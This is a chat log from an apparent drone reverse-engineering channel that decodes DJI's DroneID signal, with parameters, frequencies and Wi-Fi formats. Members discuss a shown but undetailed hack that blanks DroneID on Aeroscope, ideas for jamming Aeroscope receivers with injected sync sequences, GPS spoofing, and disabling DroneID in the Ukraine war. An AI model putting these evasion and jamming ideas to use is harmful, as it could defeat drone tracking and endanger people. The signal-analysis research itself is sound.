Keeping in mind this also has some domestic applicability. If you missed this. I suggest you look at it again if you are a privacy buff. https://dji-rev.com/dji-rev/pl/pptszbnjj7nqubyik678fkb4uo
[2022-04-08 15:38:14]
dragorn :
(Just to continue beating that drum to be clear: yes. spoofing random GPS locations could get someones house / school / etc bombed. Don't fucking do that, because that's not any of our calls to do. Flip side if the defense commander knows the area is cleared and needs to protect operators during the pull out, a tool can save lives.)
[2022-04-08 15:38:51]
hostile :
Shit getting real for ALL of us...
[2022-04-08 15:40:10]
dragorn :
AKA "some of the reasons i got out of that industry once promises were being made re: protection that weren't possible, and the stakes become 'people get blowed up' not 'oh no, pictures of your resort.' ".
[2022-04-08 15:41:29]
hostile :
@dragorn yeah it is not at all lost on me, that I'm back here *now* for the exact same reasons I left as well... overzealous sales folks selling protection hype that just wasn't accurate. Crazy how that works! I legit got PTSD from time at D13. Hence why I literally threw every drone related thing I had and black listed all drone talk for nearly 3 years.
[2022-04-08 16:14:51]
tho :
instead of spoofing to create artificial decoy drones, a complementary approach could be to develop a patch for the controller (maybe drone as well?) that disables DroneID. then an aeroscope could not pick up the signal anymore, but remote control and video would still be possible. would this be viable?
[2022-04-08 16:17:47]
hostile :
tools to disable droneID exist. DJI claims it is not possible. Part of this effort is to make them acknowledge the functionality in the same fashion they do NFZ unlocks.
[2022-04-08 16:18:08]
hostile :
IF someone wants to request a disable they should not have to contact OGs that have morality conflicts and issues vetting the requests.
[2022-04-08 16:18:32]
hostile :
if disabling droneID is outlawed, only outlaws have drones with disabled droneID
[2022-04-08 16:19:29]
hostile :
we had the same morality issues with the original NFZ unlock requests
[2022-04-08 16:25:36]
tho :
probably some people here in this channel are also interested in disabling droneID in a reliable way, that would also be helpful in practice. Spoofing/decoys can have side-effects as mentioned above.
[2022-04-08 16:25:53]
tho :
In the Ukraine, laws are not followed at the moment...
[2022-04-08 16:31:58]
j4ck :
@hostile I would recommend the following paper for RM and turbocoding. You will also find information about the subblock interleaving like the permutation table. The scrambling is done via gold sequence
https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=4656994
[2022-04-08 16:50:29]
hostile :
@tho "In the Ukraine, laws are not followed at the moment..." oh indeed, same argument works there. DJI argued that only 'good guys' have access to receive the "encrypted" droneID packets. Seems to imply that if you can't receive them you are a bad guy ;) https://www.theverge.com/22985101/dji-aeroscope-ukraine-russia-drone-tracking
[2022-04-08 16:52:43]
hostile :
having sold "0day" in the past, I'm of the mindset now that openly discussing things both allows folks to mitigate, and/or take advantage of a situation. It is level opportunity however. Keeping information private only allows folks with money, access, or influence to abuse it if they should choose to. I'm personally of the mindset that the DUML commands to disable DroneID simply be shared openly with no fucks. (it will also further the arms race with DJI so some folks are opposed to it). The commands aren't *mine* to share nonetheless. You will absolutely find me reference the few times they've been shared in public nonetheless. I have no qualms about information flow.
[2022-04-08 16:53:20]
dragorn :
absolutely; preventing the transmission rather than having to disperse chaff and hope you can beat heuristics is always a bigger win. 100% agree.
[2022-04-08 16:53:30]
hostile :
I can make you a knife... and you can cut your steak with it. You can also go stab your neighbor. Simply being aware that I make knives, and exactly how I make them, may perhaps afford you some protection against your neighbor should he choose to stab you just the same.
[2022-04-08 16:56:52]
hostile :
I hope the memetics I tried to inject years ago make more sense now "H.A.R.D. - Hackers Against Remote DroneID" https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie
[2022-04-08 16:57:05]
hostile :
this discussion ain't gonna get any easier.
[2022-04-08 17:14:59]
dragorn :
"the day you learn your academic/hacker bullshit got someone murked"
[2022-04-08 17:15:06]
dragorn :
bad days, those.
[2022-04-08 17:21:50]
dragorn :
cue all the mil/intel folks. "yeah no shit kid"
[2022-04-08 18:08:58]
hostile :
I'll certainly say @dragorn I wasn't expecting people to be writing me literally from a trench thanking me for you and my work alongside the other OGs here in getting this writeup in 2017. "sobering" is perhaps the best word to describe it. https://approveddronepilots.co.uk/wp-content/uploads/2018/05/Anatomy-of-DJI-Drone-ID-Implementation1.pdf
[2022-04-08 18:10:38]
hostile :
maybe I should continue embracing my "Negrodamus" side !?
[2022-04-08 18:13:42]
hostile :
[2022-04-08 18:14:32]
hostile :
maybe I should continue embracing my "Negrodamus" side !? ^
[2022-04-08 21:41:49]
proto :
What I meant by that statement was that I upsampled by 4 (61.44 MSPS giving an FFT size of 4096), and then ran an autocorrelator that looked for a window of 4096 samples where the first half matched the reverse of the second half. I was taking advantage of the fact that the Zadoff-Chu (ZC) sequence is symmetrical about the center. Since the ZC sequence is a CAZAC (Constant Amplitude, Zero Auto Correlation) it does a great job at not having an autocorrelation output that slowly ramps up (making it hard to tell what the true starting point was). Instead it gives a really nice peak. The reason for upsampling prior was to help get around the fact that I didn't have anything to equalize against to help deal with frequency drift. A sample offset in the time domain becomes an increasing frequency offset in the frequency domain. So by being as accurate as possible in the time domain starting sample, I can prevent most of the smearing that happens to the constellation in the frequency domain. Now, this method doesn't do anything about the fact that I have no idea what the phase offset is, and it also doesn't correct for the frequency offset. The phase offset might be fixable if there are points where the phase is known ahead of time (would need to figure out the ZC sequence root and offset), or maybe with the DC carrier which seems to have a constant phase offset (though it's low amplitude and I worry that in low SNR it's going to be useless). For the frequency offset the ZC sequence might be usable. Since it does repeat, and does so on average less than one OFDM symbol (I can explain further if you're curious), I *think* it can be used to determine the frequency offset. Though, I am also curious about the time domain view of the second ZC sequence. It sorta looks like it repeats itself regularly. If true then we might be able to use it like the preamble of an 802.11 frame. Hope that clears up my response to @hostile. Happy to answer any questions.
Lord knows I've asked a lot so far :)
[2022-04-08 21:44:12]
proto :
oh, and I'm not a DSP expert. These are just tricks that I've picked up over the years to deal with demodulating signals. So if you see that I've said something stupid, please point it out! I don't want to give bad info
[2022-04-08 22:20:24]
atlantic :
The first ZC is not sensitive to carrier frequency offset due to its properties, visual in the waterfall as a chirp. It always gives a single peak even in the presence of cfo. There are only a few with that property, so therefore it is also used in the uplink, so I get false positives on the uplink packets when they hop around the same freq as the drone id. The second ZC has only a single peak if you corrected cfo, otherwise it gives 2 or 4 or more peaks.
[2022-04-08 22:21:08]
proto :
Are you talking about auto or cross correlation? I can't cross correlate as I don't know the ZC root/offset
[2022-04-08 22:21:37]
proto :
I would love to know the ZC params to do equalization :)
[2022-04-08 22:21:39]
atlantic :
oversampling makes it more computationally complex and is not necessary.
[2022-04-08 22:22:40]
proto :
oversampling def makes it more complex for sure. Not stoked about having to do that atm. But I need to be bang on the starting sample offset without knowing the ZC params to cross correlate for it. I was finding in my experiments that I needed to oversample to get really close to the true starting sample
[2022-04-08 22:22:55]
atlantic :
you have to find out the ZC params. just brute force it to find out, there are only that many.
[2022-04-08 22:23:54]
proto :
so i started doing just that and wanted to eyeball the spectrograms
[2022-04-08 22:24:02]
proto :
```
% Brute-force candidate Zadoff-Chu roots for a 601-point sequence and dump
% spectrograms of each candidate in 5x5 grids so they can be eyeballed.
fft_size = 1024;
seq_len = 601;
seqs = zeros(fft_size, seq_len);
valid_seqs = zeros(fft_size, 1);
for i = 1:fft_size
    try
        % zadoffChuSeq errors when the root is not coprime with seq_len;
        % those rows stay all-zero and are flagged as invalid
        seqs(i,:) = fftshift(ifft(zadoffChuSeq(i, seq_len)));
        valid_seqs(i) = 1;
    catch
        continue
    end
end
rows = 5;
cols = 5;
per_grid = rows * cols;
f = figure('Visible', 'off');
for offset = 0:per_grid:(fft_size - 1)
    clf(f);
    for i = 1:per_grid
        idx = offset + i;
        if idx > fft_size || ~valid_seqs(idx)
            continue   % past the last root, or a non-coprime root (skip the empty row)
        end
        subplot(rows, cols, i);
        spectrogram(seqs(idx,:));
        title(sprintf('root %d', idx));
    end
    saveas(f, [mat2str(offset), '.png']);
end
```
[2022-04-08 22:24:14]
proto :
super rough code, but that was me messing around with it
[2022-04-08 22:25:11]
proto :
i have heard from a friend that it's not a straightforward "plug this value in and get cookie" situation though. he mentioned something about having to puncture the output and possibly having to apply a cyclic shift
[2022-04-08 22:25:14]
atlantic :
you need to have the known ZC, because you need it to do channel estimation with, to get rid of your phase errors.
[2022-04-08 22:26:09]
proto :
so i can get rid of all but the absolute phase error by oversampling in the time domain to get the fractional time offset fixed. but the absolute phase offset is def a problem for me
[2022-04-08 22:26:36]
proto :
i don't have much in the way of drifting phase error atm
[2022-04-08 22:27:15]
atlantic :
oversampling not necessary.
[2022-04-08 22:27:28]
proto :
do you know if it really is just brute forcing roots from 1 to N and correlating to find the correct ZC?
[2022-04-08 22:27:46]
atlantic :
sure
[2022-04-08 22:28:07]
atlantic :
in time domain
[2022-04-08 22:28:09]
proto :
no crazy puncturing, rotate by 4, stand on one foot kinda thing?
[2022-04-08 22:28:18]
atlantic :
hell no
[2022-04-08 22:28:31]
proto :
lol welp, time to turn my computer into a heater :D
[2022-04-08 22:28:58]
proto :
thanks for the info!
[2022-04-08 22:29:52]
atlantic :
enjoy your quest
[2022-04-08 22:34:45]
proto :
one thing i'm not clear on as far as dealing with phase offsets: generally you have pilots to help correct for the walking phase offset in the freq domain that's caused by not having the *perfect* starting sample in the time domain. i suppose the burst is short enough that the first zc can be used to figure out what the walking phase offset is, and extrapolate from there how far to move the phase of each other carrier in the previous and next ofdm symbols. is that common practice in lte? i've only had experience with WiFi at the physical layer and we have pilots to deal with the time offset issue. it just seems strange to have the samples you use for equalization happening *after* the burst has started. really, just curious about why it works this way
[2022-04-08 23:07:45]
proto :
why hello there zc sequences :D not 10000% sure these are right just yet, but promising
[2022-04-09 03:27:56]
proto :
thanks for the advice @atlantic!! i think that did it :D
[2022-04-09 03:28:37]
proto :
it's really interesting to me that the first zc can be used even if there is a *massive* frequency offset O.O
[2022-04-09 05:22:25]
skyninja :
ZC = a very big pilot
[2022-04-09 05:39:23]
skyninja :
ZC in the middle: suppose you have the first symbol ZC to do channel estimation etc. There will be a small error x. so the next symbol has error x, the 2nd next will have error 2x, the 6th symbol will have 6x. when you put the symbol in the middle, the 3rd symbol before will have error -3x and the 3rd symbol after will have 3x. And 3x is half of 6x.
[2022-04-09 07:17:15]
tmbinc :
BTW if someone needs my IQ recording of 1.3s at 200MS/s, I'm happy to share but it's 2GB. It contains uplink (with hopping), downlink, and droneid.
I also started to look for the hopping algorithm in the S1 software. Big unknowns yet but I know roughly where the channel number is calculated, where the hopping is done and where the switch of the hopping sequence (subframe 330, every 640 subframes) is done. If someone is interested, I know how to enable logging on the S1 (it comes through a different USB pipe), but it doesn't have strings, only message IDs, for which I know a very small subset (by reversing LC1860 firmware, which still has strings, or P1 software, which still has some strings) but a lot is unknown especially for L1 (which is handled on the Cortex-M on S1, but on the DSP for LC1860 and P1)
[2022-04-09 07:20:36]
tmbinc :
I need to look into my RF chain again. I was not having a lot of luck with equalizing to ZC (as opposed to using it for frequency offset detection)
[2022-04-09 07:20:36]
tmbinc :
I need to look into my RF chain again. I was not having a lot of luck with equalizing to ZC (as opposed to using it for sample offset detection)
[2022-04-09 07:23:33]
atlantic :
just look at the excitement you get from discovering yourself (-:
[2022-04-09 07:26:14]
atlantic :
Now you are able to detect drone id packets even in the presence of CFO, you should now make a tool to cut out slices that only contain the packet and leave out the rest. Just take 3x the packet length, packet in the middle. You are never gonna find scrambling etc by looking at one packet. So you need to collect packets. Different drones, different drone types etc, so you can see structure. What changes, what stays the same etc. @tmbinc already offered one.
[2022-04-09 07:26:22]
atlantic :
Here is my donation of a sample:
[2022-04-09 07:26:36]
atlantic :
https://doi.org/10.5281/zenodo.4246392
[2022-04-09 07:28:04]
tmbinc :
Oh very nice!
[2022-04-09 07:30:03]
atlantic :
so make a drone id packet cut tool and that 2GB of @tmbinc will be two small files with a drone id. Easy to share and work on as a team.
[2022-04-09 07:32:15]
atlantic :
and of course decimate to 15.36 MS/s with the packet roughly in the center.
[2022-04-09 07:33:52]
tmbinc :
I thought we may want to go the next step and cover all 3 signals :)
[2022-04-09 07:34:56]
atlantic :
First you have to do the basics, then continue with the rest, Rome wasn't built in a day.
[2022-04-09 07:35:25]
atlantic :
But yes, I can do droneid but not downlink, so I am in (-:
[2022-04-09 13:02:42]
bin4ry :
I ran a test with an Aeroscope. If i am not mistaken the droneID broadcast is not disabled, but the information in it will be gone after applying the magic.
[2022-04-09 13:03:00]
bin4ry :
[2022-04-09 13:03:37]
bin4ry :
CIAJeepDoors was the idea of @hostile, lol
[2022-04-09 13:04:53]
bin4ry :
i also did a video, but due to my skills the video is unbearable
[2022-04-09 13:07:29]
bin4ry :
this is a Mavic3 running the 01.00.0600 firmware
[2022-04-09 13:07:39]
bin4ry :
I also tested the Mini SE (Wifi)
[2022-04-09 13:08:07]
bin4ry :
Mini needs arming of motors to send the broadcast, the Mavic3 starts broadcasting as soon as powered on (which was already mentioned here)
[2022-04-09 13:08:59]
atlantic :
Is this permanent or something you have to apply each flight?
[2022-04-09 13:09:26]
bin4ry :
it sticks. i have tested it with the latest dji fly and an online phone
[2022-04-09 13:09:37]
bin4ry :
it stays there over several reboots and restarts of the app
[2022-04-09 13:10:04]
bin4ry :
i have tested another app version (sadly stupid me cannot remember which one it was) and it did reset the values on boot
[2022-04-09 13:10:21]
bin4ry :
but the current one doesn't reset the flags and the broadcast stays like this
[2022-04-09 13:10:43]
skyninja :
this is much better than spoofing
[2022-04-09 13:11:21]
bin4ry :
so dji is tricky here again, they claim the broadcast cannot be disabled, which is somewhat true ... but , you see yourself, the info is gone
[2022-04-09 13:12:40]
bin4ry :
and well, for security reasons i would suggest more testing with versions and phones and OSes, that the flags stay disabled
[2022-04-09 13:12:50]
hostile :
CIAJeepDoors is an anagram for DJIAeroscope. I lost my shit when the anagram solver spit it out, because of stuff like this. https://cj3b.info/History/Congo15.html
[2022-04-09 13:13:19]
hostile :
@bin4ry you rock mate. I just got up have to chill with the kids. Will check back later!
[2022-04-09 13:13:23]
bin4ry :
of course it is not a guarantee that there aren't other ways to locate, but at least it would break the aeroscope detection in its current form
[2022-04-09 13:14:38]
konraditurbe :
This one, right? https://www.apkmirror.com/apk/dji-technology-co-ltd/dji-fly/dji-fly-1-5-10-release/
[2022-04-09 13:16:02]
konraditurbe :
What does the Aeroscope show when the drone has the hack enabled? Does it just not show anything at all?
[2022-04-09 13:16:29]
hostile :
"fakefake" on the screen and 0,0 for GPS?
[2022-04-09 13:16:33]
bin4ry :
@konraditurbe images AS4-AS6 are AFTER the hack
[2022-04-09 13:16:52]
bin4ry :
AS, AS2 are prior to the hack
[2022-04-09 13:17:44]
konraditurbe :
Meant on the map, if it places a marker anywhere at all.
[2022-04-09 13:18:24]
bin4ry :
The AS places the marker at Null Island ;)
[2022-04-09 13:27:41]
dkovar :
0,0 is a buoy in the Atlantic - https://en.wikipedia.org/wiki/Null_Island
[2022-04-09 13:28:07]
bin4ry :
will tweet this to annoy dji
[2022-04-09 13:28:22]
bin4ry :
but will edit out the DH.com background in the 3 image, lol
[2022-04-09 14:32:25]
tmbinc :
ok cool! BTW in S1 firmware there are multiple conditions which need to be true for droneid broadcasts to happen
[2022-04-09 14:32:47]
tmbinc :
so very likely we could also just disable the broadcast altogether by sending something to the S1
[2022-04-09 15:20:04]
cs2000 :
fantastic proof of concept there @bin4ry love the anagram from Aeroscope @hostile , this group comes up with the best names !
[2022-04-09 15:25:39]
atlantic :
the frequencies for drone id are 2414.5, 2429.5, 2444.5 and 2459.5 MHz. if you want to annoy DJI on Twitter, it helps if you tweet the right frequencies, otherwise DJI are LOL ?
[2022-04-09 15:27:25]
atlantic :
Does anyone know the drone id freqs in 5725-5850 MHz?
[2022-04-09 15:30:33]
atlantic :
How does uplink know it can transmit? is that on cue of downlink, or does it have fixed time slots?
[2022-04-09 15:30:47]
the_lord :
what about the 5.8 Ghz droneID frequencies?
[2022-04-09 15:31:25]
atlantic :
yes that was my question as well.
[2022-04-09 15:31:51]
the_lord :
you mean the drone doesn't transmit droneID on 5.8Ghz?
[2022-04-09 15:32:15]
atlantic :
it does, i just do not know the freqs
[2022-04-09 15:34:15]
atlantic :
does an Aeroscope say what freqs it listens to?
[2022-04-09 15:35:40]
the_lord :
AS gives the RF type and RF index
[2022-04-09 15:36:23]
the_lord :
there are 8 modules for each protocol
[2022-04-09 15:41:21]
the_lord :
RF_Type[0] = LB
RF_Type[1] = WiFI
RF_Type[2] = SDR
[2022-04-09 15:41:59]
the_lord :
and the module index you can configure its frequency for each RF type
[2022-04-09 15:45:25]
the_lord :
the default frequency for each module is:
RF_Index[0] = 2.4
RF_Index[1] = 2.4
RF_Index[2] = 5.8
RF_Index[3] = 5.8
RF_Index[4] = 2.4
RF_Index[5] = 2.4
RF_Index[6] = 5.8
RF_Index[7] = 5.8
[2022-04-09 15:46:25]
the_lord :
so the answer is yes, you can tell on which frequency you detected the drone and on which protocol
[2022-04-09 15:48:46]
the_lord :
DJI's web app doesn't show these detection details
[2022-04-09 15:56:20]
hostile :
I wonder what detail the SDK gives
[2022-04-09 16:30:32]
atlantic :
ok, that proves it receives on 5.8 as well
[2022-04-09 16:35:00]
proto :
Thank you very much for the info!
[2022-04-09 16:37:27]
proto :
I was considering uploading individual bursts, but was concerned about the fact that my GPS location would be in the file :( Maybe firing up a GPS spoofer and then recording? Would either need a direct connection (wired) to the GPS input or an RF enclosure to prevent freaking out all the devices around me tho
[2022-04-09 17:09:20]
hostile :
just run down the road to a park
[2022-04-09 17:09:21]
hostile :
=]
[2022-04-09 17:21:34]
jan2642 :
GPS is below the noise floor. It doesn’t take much power to disrupt a whole region. You could do it indoors, just remember you can take off the blades ;-)
[2022-04-09 17:23:23]
hostile :
yeah I don't advise spoofing GPS generally speaking
[2022-04-09 17:26:38]
the_lord :
I remember how my wife used to freak-out whenever I spoof the GPS with old date/time :D
all apps on her mobile stop working
[2022-04-09 19:08:08]
konraditurbe :
wrap the drone in tinfoil
[2022-04-09 19:11:24]
tmbinc :
I don't care that much about my GPS position tbh
[2022-04-09 19:11:32]
tmbinc :
it's relatively easy to look up my address
[2022-04-09 19:12:03]
the_lord :
I used to spoof GPS to test NFZ hacks back in 2017
[2022-04-09 19:25:56]
jan2642 :
If I would have to spoof GPS I don’t have anything left to record the transmission of the drone…
[2022-04-09 20:12:58]
dragorn :
has anyone got some pcaps they're willing to share w/ some of the legacy "definitely v1" (whatever you want to call it) droneid on wifi? I've integrated the new "v2" (for lack of a better term for it) which uses a longer 0x10 flight record message, but there's some debate if it's truly all v2; some devices in the pcap that we'd expect to be legacy are *definitely* sending the longer 0x10 message (the version long enough for a GPS time + app coord block) vs the original format, which had neither of those, and are versioning it as a 0x10 0x02 v2 message. I don't have my original pcaps from years ago of the v1 advertisements.
[2022-04-09 20:23:43]
the_lord :
AS tcp pcap ?
[2022-04-09 20:46:11]
the_lord :
P4A: 0x00 0x01 0x00
P3S: 0x01 0x10 0x01
In2: 0x00 0x01 0x00
P4: 0x01 0x10 0x02
P4A: 0x00 0x00 0x00 + 0x01 0x10 0x01 (broadcasting 2 different droneID)
M300: 0x01 0x10 0x02
Mavic 3: 0x01 0x10 0x03
[2022-04-09 21:02:21]
dragorn :
@the_lord a wifi pcap; they drop it in the IE 221 vendor tag of beacons when they're sending it
[2022-04-09 21:05:01]
the_lord :
sorry I don't have wifi pcap
[2022-04-09 21:05:25]
dragorn :
no worries, appreciated
[2022-04-09 21:05:44]
the_lord :
all drones I have at the moment are MP, mini2 and M3
[2022-04-09 21:16:52]
mutantroar :
I think the only drone generating a working v1 wifi drone id is the Spark. The Mavic Pro in Wifi mode will generate the packet in the vendor tag, but the data is all 00. The Air and Mini WiFi drones broadcast v2.
[2022-04-09 21:21:49]
jan2642 :
IIRC I captured some MP1 wifi years ago which had data in the IE tags. It’s in that D13 paper @hostile posted. I can make a new capture in a few days.
[2022-04-09 21:23:07]
dragorn :
@mutantroar I remember multiple devices being very wacky w/ the IE tag, yeah - I remember it being firmware rev based rather than hw based, but it's been years so...
[2022-04-09 21:23:20]
hostile :
I was going to buy a Mavic Air or Spark as I assumed it was something specific to them. We seem to have a v1, and v1.5 (somewhere in between), and a v2 packet.
[2022-04-09 21:23:33]
dragorn :
@jan2642 that'd be awesome when you get the time; ironically i helped write that paper & wrote the code behind it, I just don't have the pcaps anymore :)
[2022-04-09 21:23:37]
hostile :
so yeh @jan2642 if you have one you'll save me a few hundred bucks. =]
[2022-04-09 21:24:04]
dragorn :
but it sounds like the new stuff is all "v2" now anyhow even w/ old firmware, which kind of matches what I've seen in the newer pcaps
[2022-04-09 21:24:51]
dragorn :
https://github.com/kismetwireless/kismet/blob/master/dot11_parsers/dot11_ie_221_dji_droneid.cc#L45
[2022-04-09 21:29:47]
jan2642 :
I don’t have a Spark but I do have an MA. I can capture that tomorrow (we’re gone for a weekend and I brought the MA along)
[2022-04-09 21:58:29]
hostile :
btw... for anyone saying to themselves. "Surely no one would use a Mavic Air in a warzone..."
[2022-04-09 21:58:37]
hostile :
https://t.me/grey_zone/13315
[2022-04-09 22:01:03]
the_lord :
for whoever interested in ocusync droneID frequencies :
I did test today and found the following frequencies from mini2 and Mavic 3:
2414.5, 2429.5, 2444.5, 2459.5, 2474.5, 5741.5, 5756.5, 5771.5, 5786.5, 5801.5, 5816.5, 5831.5
[2022-04-09 22:01:28]
the_lord :
I was scanning out of standard range and these were the only frequencies I found
[2022-04-09 22:01:53]
the_lord :
2.3-2.5 / 5.6 - 5.9
[2022-04-09 22:02:56]
the_lord :
to speed up the finding I switched both drones on without RC to eliminate the uplink false detection
[2022-04-09 22:03:21]
hostile :
I'm still shocked they auto broadcast now even when props are not armed. very sketchy
[2022-04-09 22:03:56]
the_lord :
I discovered that even if you force the drone on 2.4 it broadcasts droneID on both 2.4 and 5.8
[2022-04-09 22:04:29]
the_lord :
and the droneID frequency keeps changing, semi hopping
[2022-04-09 22:12:19]
proto :
i was wondering why i wasn't seeing droneid traffic in 2.4 for seconds at a time. thanks for the info!
[2022-04-09 22:12:31]
proto :
really wish i had an x300 these days :(
[2022-04-09 22:13:12]
the_lord :
i'm using cloned hackRF :D
[2022-04-09 22:14:16]
proto :
oof, hard mode lol
[2022-04-09 22:14:36]
proto :
at least you didn't have to shell out $900 O.o
[2022-04-09 22:14:50]
the_lord :
I saw 2474.5 only 8 times during the 20 minutes test from 2 drones broadcasting at the same time
[2022-04-09 22:15:09]
proto :
yikes, well that's gonna be annoying for collecting lots of bursts
[2022-04-09 22:15:24]
proto :
may have to write some freq hopping nonsense :(
[2022-04-09 22:16:03]
proto :
there was a post here a day or two ago about the hopping sequence of droneid following a predictable path. do you know if that's actually the case?
[2022-04-09 22:16:18]
proto :
would be nice if so. could wait until no bursts, and move to the next freq
[2022-04-09 22:17:29]
proto :
i say that as though it's as easy as tapping a yagi on the cpu and out pops a script to handle that logic..
[2022-04-09 22:17:45]
the_lord :
I didn't finish testing yet, looking for frequency change sequence is in mind
[2022-04-09 22:18:53]
the_lord :
I was testing without antenna to minimize noise
[2022-04-09 22:22:52]
proto :
dunno about the hackrf, but the ettus radios like running with the rx gain maxed. lower noise figure :)
[2022-04-09 22:22:56]
proto :
https://kb.ettus.com/images/a/ae/B200mini_B205_RF_Performance_Data_20160119.pdf
[2022-04-09 22:24:47]
the_lord :
during this test I discovered I have a lot of noise in my place at 2444.5 and 5756.5
[2022-04-09 22:25:46]
proto :
what are the odds that a drone ID channel could be spammed with invalid data symbols, but valid ZC symbols? something like a DoS that keeps the receiver of the AS busy so it misses valid frames? i'm not sure about where in the receive state machine the AS will figure out that something goofy is happening and give up. if it happens later in the state machine, then maybe even a lower power burst will keep the AS' attention long enough to miss most of the frames from legit drones
[2022-04-09 22:26:17]
proto :
basically, modulate random BS in symbols 1, 2, 3, 5, 7, 8, and 9 but valid ZC in 4 and 6
[2022-04-09 22:26:49]
proto :
can the turbo decoder detect something's fucky before the end?
[2022-04-09 22:27:24]
proto :
i'm making an assumption that the only thing that could prevent turbo decoding is the ZC not being valid
[2022-04-09 22:28:09]
the_lord :
this question is not for me, I capture the signal and eyeball it for droneID :sweat_smile:
I don't know what ZC and BS are :D
[2022-04-09 22:40:55]
proto :
an open question to anyone that might know: is the first LFSR in the scrambler generation using the LTE standard default value?
I'm in the process of writing a MATLAB/Octave script to pluck droneID frames out of a larger collect so I can compare multiple bursts, but I suspect I'm still going to have to brute force the LFSR initial value (unless it's dumb like all ones, zeros, reversals, etc) which is going to be a fair chunk of time considering there are 2.15 billion possibilities assuming that I only need to brute force one of the LFSR initial values O.O and i can only brute force if there are known values to validate that the scrambler removal was successful (dropping out to all zeros/ones as an example)
[2022-04-09 22:42:03]
proto :
i know there are techniques for discovering the taps and initial fills for direct scramblers (assuming just one LFSR is doing the scrambling). i do not know of anything that do that with two LFSRs XOR'd together
[2022-04-09 22:58:30]
hostile :
@j4ck and @tho maybe have some hints ^ ?
[2022-04-09 23:00:00]
proto :
i should have noted that i tried using 0x12345678 and reversals thereof, but didn't see anything heavily weighted to ones or zeros in the first 64 bits of the first symbol. but, could definitely be an issue on my side. i did find out that i was demodulating the data carriers as bpsks... so let's not rule out me being dumb...
[2022-04-09 23:00:57]
proto :
https://github.com/proto17/dji_droneid/blob/main/matlab/automatic_detector.m#L202 is what i was trying
[2022-04-09 23:18:16]
hostile :
That's the stupidest combination I've ever heard in my life! "1-2-3-4-5, that's amazing! I've got the same combination on my luggage!" https://www.youtube.com/watch?v=_JNGI1dI-e8
[2022-04-09 23:20:20]
proto :
man, really gaining an appreciation of matlab. soooo many `run function, get cookie` features compared to octave
[2022-04-10 07:16:13]
atlantic :
Did you watch The Karate Kid when you were young? Mr Miyagi says you must first learn the basics: wax on, wax off. You must first have your demodulation to bits right, before you go to the next phase of scrambling. You want too fast. Wax on. Wax off.
[2022-04-10 07:42:23]
atlantic :
About jamming: you probably already discovered that if your ZC peak is only one sample off, it ruins your entire constellation. I haven't tried, but I assume that inserting ZC at the "right" moment, even with low power, will get a receiver lost.
[2022-04-10 07:44:01]
atlantic :
or insert ZC continuously so the odds increase that you have the right moment.
[2022-04-10 10:54:18]
atlantic :
BS=bullshit ?
[2022-04-10 13:45:48]
tho :
I'll check with the students, unfortunately I do not know the details
[2022-04-10 14:17:30]
hostile :
lol Wax on, Wax off before Paint the Fence!
[2022-04-10 14:18:23]
hostile :
https://www.youtube.com/watch?v=R37pbIySnjg
[2022-04-10 14:18:56]
hostile :
@atlantic says its all in the wrist @proto :sweat_smile: :rolling_on_the_floor_laughing: :joy:
[2022-04-10 14:19:07]
hostile :
"don't forget to breathe"
[2022-04-10 14:40:08]
proto :
so i just realized that the bit to symbol mapping wasn't right for LTE according to https://github.com/ttsou/openphy/blob/master/src/lte/qam.c#L35 so i fixed that little bug. derp
[2022-04-10 16:52:28]
atlantic :
https://github.com/open-sdr/openwifi/issues/143
[2022-04-10 16:52:48]
atlantic :
this is a cool board.
[2022-04-10 16:54:39]
atlantic :
can somebody program that Zynq FPGA? if we can offload the ZC correlation to an FPGA, the rest of Ocusync drone id decoding can run on the cpu.
[2022-04-10 18:47:28]
tmbinc :
Or ADALM-PLUTO but uh they got expensive
[2022-04-10 18:47:43]
tmbinc :
Also most WiFi chipsets support a raw RX/TX mode
[2022-04-10 18:48:30]
hotelzululima :
wouldn't PLUTO need a GPSDO added?
[2022-04-10 18:48:41]
tmbinc :
not for receiving
[2022-04-10 18:48:53]
hotelzululima :
ah k
[2022-04-10 18:49:04]
tmbinc :
I mean also not for transmitting if you don't care about the exact frequency :)
[2022-04-10 18:49:22]
tmbinc :
And since this is all happening in 2.4G/5G bands, it should work fine(tm)
[2022-04-10 18:50:14]
hotelzululima :
sheesh.. should have bought a few more, PLUTO DID get expensive...
[2022-04-10 18:52:07]
atlantic :
i assumed the fpga on the pluto is very small and does not allow for adding much
[2022-04-10 18:55:59]
tmbinc :
Yeah it's a XC7Z010
[2022-04-10 18:56:11]
tmbinc :
(is that actually different silicon than the 020?)
[2022-04-10 18:56:42]
hotelzululima :
FPGA
Logic Cells: 28k
Block RAM: 2.1Mb
DSP Slices: 80
[2022-04-10 18:57:18]
hotelzululima :
https://wiki.analog.com/university/tools/pluto/devs/specs
[2022-04-10 19:01:20]
atlantic :
i have a pluto, but i cannot program vhdl etc and i also do not have the toolchain.
[2022-04-10 19:01:28]
mutantroar :
You'll miss the 5.8Ghz with the Pluto
[2022-04-10 19:01:47]
atlantic :
you can mod the pluto to 6 ghz
[2022-04-10 19:01:59]
atlantic :
sw mod
[2022-04-10 19:09:00]
mutantroar :
did not know that.. thanks
[2022-04-10 19:09:02]
tmbinc :
We'd need overlapping FFTs and then correlation right?
[2022-04-10 19:10:06]
tmbinc :
Or could we preselect by checking for CPs first?
[2022-04-10 19:20:19]
hotelzululima :
wasn't aware of pluto+ https://github.com/plutoplus/plutoplus
[2022-04-10 19:21:18]
hotelzululima :
btw https://www.rtl-sdr.com/techminds-performing-the-frequency-expansion-and-cpu-core-mod-on-the-plutosdr/
[2022-04-10 20:05:23]
mutantroar :
That makes the pluto a very inexpensive alternative to the BladeRF
[2022-04-10 20:10:00]
hiddentty :
hiddentty joined the channel.
[2022-04-10 20:18:41]
atlantic :
my (naive) implementation is scipy.signal.correlate. a sample of 1 sec takes 4 sec to correlate. i also use cusignal that speeds up a lot, but you need an nvidia gpu for that.
[2022-04-10 20:20:12]
atlantic :
if there is a software trick or fpga that "preselects", that would help a lot.
[2022-04-10 20:21:10]
hiddentty :
Hi new here ! very interested by the subject
[2022-04-10 20:21:40]
atlantic :
In normal LTE N=62, that is so much faster than N=601 or N=1201.
[2022-04-10 20:22:07]
hiddentty :
I've done a thread on the r/DJIUnlocker Reddit sub about this subject last week.
[2022-04-10 20:25:34]
atlantic :
Also a normal Pluto has USB 2.0 so it cannot sample so fast continuously, only bursts. So if an FPGA can preselect and only actual packets go over USB that will help a lot.
[2022-04-10 20:26:02]
hiddentty :
